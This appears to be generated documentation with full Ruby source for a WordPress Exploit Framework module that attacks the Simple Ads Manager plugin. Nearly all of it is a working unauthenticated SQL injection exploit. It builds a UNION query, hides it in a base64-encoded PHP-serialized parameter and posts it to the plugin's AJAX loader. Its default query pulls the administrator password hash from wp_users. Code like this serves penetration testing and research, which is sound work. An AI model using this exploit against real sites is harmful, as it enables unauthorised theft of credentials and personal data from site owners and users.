class Wpxf::Auxiliary::SimpleAdsManagerSqlInjection

Public Class Methods

new()
Calls superclass method Wpxf::Module::new
# File lib/wpxf/modules/auxiliary/misc/simple_ads_manager_sql_injection.rb, line 9
# Builds the module: runs the Wpxf::Module constructor, records the
# module metadata via update_info and registers the single 'sql' option
# whose value is later rewritten into the injected query.
def initialize
  super

  description = 'This module exploits an SQL injection in version 2.9.5.116 of the Simple Ads Manager '\
                'plugin which allows unauthenticated users to view a single field of data at a time, '\
                'such as e-mails and passwords.'

  update_info(
    name: 'Simple Ads Manager SQL Injection',
    desc: description,
    # first entry: vulnerability discovery; second entry: WPXF module author
    author: ['Kacper Szurek', 'rastating'],
    references: [
      ['URL', 'http://security.szurek.pl/simple-ads-manager-294116-sql-injection.html'],
      ['WPVDB', '8357']
    ],
    date: 'Dec 30 2015'
  )

  query_option = StringOption.new(
    name: 'sql',
    desc: 'The SQL query to execute (maximum of one field selected)',
    default: 'select user_pass from wp_users where ID = 1',
    required: true
  )
  register_options([query_option])
end

Public Instance Methods

check()
# File lib/wpxf/modules/auxiliary/misc/simple_ads_manager_sql_injection.rb, line 64
# Delegates the vulnerability check to check_plugin_version_from_readme
# with the plugin slug and two version strings; what those two versions
# mean (fixed / first vulnerable) is defined by that helper, outside this file.
# NOTE(review): the module description cites 2.9.5.116 while the second
# version passed here is 2.9.4.116 — confirm the intended version range.
def check
  plugin_slug = 'simple-ads-manager'
  check_plugin_version_from_readme(plugin_slug, '2.9.5.118', '2.9.4.116')
end
compile_sqli()
# File lib/wpxf/modules/auxiliary/misc/simple_ads_manager_sql_injection.rb, line 58
# Rewrites the 'sql' option into the UNION fragment that gets injected.
#
# Twenty-two comma-prefixed values from Utility::Text.rand_numeric (called
# with a random argument in 1..3) are appended after the selected field
# and before the FROM clause. Note the pattern is anchored with `^`, i.e.
# at a line start rather than the start of the whole string, and gsub
# rewrites every line that matches.
# @return [String] the rewritten query
def compile_sqli
  filler = Array.new(22) { ",#{Utility::Text.rand_numeric(rand(1..3))}" }.join
  sql.gsub(/^(select\s+)(.+)(\s+from.+)/i, ") UNION (\\1\\2#{filler}\\3")
end
encoded_injection()
# File lib/wpxf/modules/auxiliary/misc/simple_ads_manager_sql_injection.rb, line 72
# Wraps the compiled query in a PHP-serialized array and base64-encodes it
# for the 'wc' request parameter.
#
# The serialized form is built with a fixed template; the "s:N:" length
# prefix for the WCW entry uses bytesize because PHP serialized string
# lengths are byte counts, not character counts.
# @return [String] strict (no line breaks) base64 of the serialized payload
def encoded_injection
  injection = compile_sqli
  emit_info "Compiled SQL: #{injection}", true

  payload = format(
    'a:4:{s:2:"WC";s:3:"1=0";s:3:"WCT";s:0:"";s:3:"WCW";s:%<len>d:"%<sql>s";s:4:"WC2W";s:0:"";}',
    len: injection.bytesize,
    sql: injection
  )
  Base64.strict_encode64(payload)
end
run()
Calls superclass method Wpxf::Module#run
# File lib/wpxf/modules/auxiliary/misc/simple_ads_manager_sql_injection.rb, line 81
# Validates the configured query, sends it to the vulnerable AJAX loader
# and reports the 'pid' value of the JSON response.
#
# Returns false (after an emit_error) on any of: the superclass run
# failing, an invalid query, no/timed-out response, a non-200 or empty
# body, or a body that is not JSON. Returns true once the result has
# been printed.
# @return [Boolean]
def run
  return false unless super

  emit_info 'Validating SQL...'
  unless valid_query?
    emit_error 'Specified query appears to be invalid'
    return false
  end

  emit_info 'Preparing injection...'
  params = { 'action' => 'load_place', 'id' => '0', 'pid' => '1', 'wc' => encoded_injection }

  emit_info 'Executing request...'
  response = execute_post_request(url: vulnerable_url, body: params)

  if response.nil? || response.timed_out?
    emit_error 'No response from the target'
    return false
  end

  # Anything other than a 200 with a non-blank body is treated as failure;
  # the raw code and body are logged first to aid troubleshooting.
  unless response.code == 200 && !response.body.strip.empty?
    emit_info "Response code: #{response.code}", true
    emit_info "Response body: #{response.body}", true
    emit_error 'Failed to execute request'
    return false
  end

  emit_info 'Parsing response...'
  begin
    parsed = JSON.parse(response.body)
  rescue JSON::ParserError
    emit_error 'Could not parse the response'
    return false
  end

  # Only 'pid' is read back; a response without that key prints an empty result.
  emit_success "Query result: #{parsed['pid']}"
  true
end
sql()
# File lib/wpxf/modules/auxiliary/misc/simple_ads_manager_sql_injection.rb, line 39
# The 'sql' option as returned by normalized_option_value; every other
# method reads the query through this accessor rather than the raw option.
def sql
  option_name = 'sql'
  normalized_option_value(option_name)
end
valid_query?()
# File lib/wpxf/modules/auxiliary/misc/simple_ads_manager_sql_injection.rb, line 43
# Checks that the 'sql' option has the shape 'select <fields> from ...'.
#
# Only the field list between SELECT and FROM is inspected. A ',' or '*'
# in it produces a warning but does not fail validation. The pattern is
# anchored with `^` (line start), so a multi-line option value is
# accepted if any line matches.
# @return [Boolean] false when no field list can be extracted, true otherwise
def valid_query?
  field_list = sql[/^select\s+(.+)\s+from.+/i, 1]
  if field_list.nil?
    emit_error 'Could not determine the field list from the query', true
    return false
  end

  if field_list =~ /[,*]/
    emit_warning 'More than one field appears to have been selected. This '\
                 'can cause the query to silently fail and return no data'
  end

  true
end
vulnerable_url()
# File lib/wpxf/modules/auxiliary/misc/simple_ads_manager_sql_injection.rb, line 68
# Location of the plugin's AJAX loader script that receives the request,
# built from wordpress_url_plugins via normalize_uri.
def vulnerable_url
  plugin_dir = 'simple-ads-manager'
  script = 'sam-ajax-loader.php'
  normalize_uri(wordpress_url_plugins, plugin_dir, script)
end